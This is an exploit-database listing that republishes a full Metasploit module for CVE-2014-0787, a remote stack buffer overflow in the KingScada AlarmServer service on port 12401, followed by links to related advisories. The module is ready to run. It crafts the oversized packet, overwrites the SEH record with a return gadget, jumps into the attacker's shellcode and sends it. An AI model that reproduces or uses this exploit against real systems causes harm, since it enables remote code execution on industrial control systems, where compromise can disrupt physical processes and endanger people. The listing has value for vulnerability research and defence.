Lucene search
James Fitts1337DAY-ID-28552HistorySep 15, 2017 - 12:00 a.m.
KingScada AlarmServer 3.1.2.13 Buffer Overflow Exploit
2017-09-1500:00:00
James Fitts
0day.today
26
EPSS
0.367
Percentile
97.2%
This Metasploit module exploits a stack based buffer overflow found in KingScada versions prior to 3.1.2.13. The vulnerability is triggered when sending a specially crafted packet to the βAlarmServerβ (AEserver.exe) service listening on port 12401. During the parsing of the packet the 3rd dword is used as a size value for a memcpy operation which leads to an overflown stack buffer.
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'KingScada AlarmServer Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
KingScada < 3.1.2.13. The vulnerability is triggered when
sending a specially crafted packet to the 'AlarmServer'
(AEserver.exe) service listening on port 12401. During the
parsing of the packet the 3rd dword is used as a size value
for a memcpy operation which leads to an overflown stack buffer
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-0787' ],
[ 'ZDI', '14-071' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-098-02' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN / WellinTech KingScada 31.1.1.4',
{
# dbghelp.dll
# pop esi/ pop edi/ retn
'ret' => 0x02881fbf,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 10, 2014'))
register_options([Opt::RPORT(12401)], self.class)
end
def exploit
connect
p = payload.encoded
buf = make_nops(5000)
buf[0, 4] = [0x000004d2].pack('V')
buf[4, 4] = [0x0000007b].pack('V')
buf[8, 4] = [0x0000133c].pack('V') # size for memcpy()
buf[1128, p.length] = p
buf[2128, 8] = generate_seh_record(target['ret'])
buf[2136, 5] = "\xe9\x4b\xfb\xff\xff" # jmp $-1200
print_status("Trying target #{target.name}...")
sock.put(buf)
handler
disconnect
end
end
# 0day.today [2018-03-14] #Related
seebug
seebug
WellinTech KingSCADAζͺζθΏη¨ζ ηΌε²εΊζΊ’εΊζΌζ΄
2014-04-11 00:00:00
checkpoint_advisories
checkpoint_advisories
WellinTech KingSCADA kxNetDispose.dll Stack Buffer Overflow (CVE-2014-0787)
2014-07-27 00:00:00
cve
cve
CVE-2014-0787
2014-04-12 04:37:31
ics
ics
WellinTech KingSCADA Stack-Based Buffer Overflow
2018-09-06 12:00:00
prion
prion
Stack overflow
2014-04-12 04:37:00
zdi
zdi
WellinTech KingScada AEserver.exe Remote Code Execution Vulnerability
2014-04-10 00:00:00
packetstorm
packetstorm
KingScada AlarmServer 3.1.2.13 Buffer Overflow
2017-09-15 00:00:00
cvelist
cvelist
CVE-2014-0787
2014-04-12 01:00:00
exploitdb
exploitdb
KingScada AlarmServer 3.1.2.13 - Remote Stack Buffer Overflow (Metasploit)
2017-09-14 00:00:00
nvd
nvd
CVE-2014-0787
2014-04-12 04:37:31